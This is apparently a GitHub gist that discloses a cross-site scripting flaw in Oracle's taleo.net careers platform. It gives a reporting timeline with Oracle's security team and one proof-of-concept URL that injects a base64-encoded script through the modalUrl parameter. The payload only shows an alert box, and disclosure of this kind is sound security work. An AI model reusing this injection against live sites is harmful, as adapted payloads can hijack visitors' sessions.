Skip to content

Instantly share code, notes, and snippets.

@cedriczirtacic
Last active November 26, 2017 18:08
Show Gist options
  • Save cedriczirtacic/0731ee82a35f0c57d5c16e91619aef5f to your computer and use it in GitHub Desktop.
Save cedriczirtacic/0731ee82a35f0c57d5c16e91619aef5f to your computer and use it in GitHub Desktop.
Oracle's taleo.net platform cross-site scripting bug
[1] 17/10/2017: Contacted Oracle security alert.
[2] 17/10/2017: Sent bug and description to Oracle security team.
[3] 23/10/2017: Global Information Security Team verified the vulnerability and forwarded the issue to the appropiate team for resolution.
[4] 30/10/2017: Ticket S0934612 was assigned.
[5] ??/11/2017: Fixed.
[6] 24/11/2017: Status report for issue S0934612 ("Under investigation / Being fixed in main codeline").
https://{COMPANY}.taleo.net/careersection/akira/pub/modalFrameset.jsp?modalUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==&title=evil
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment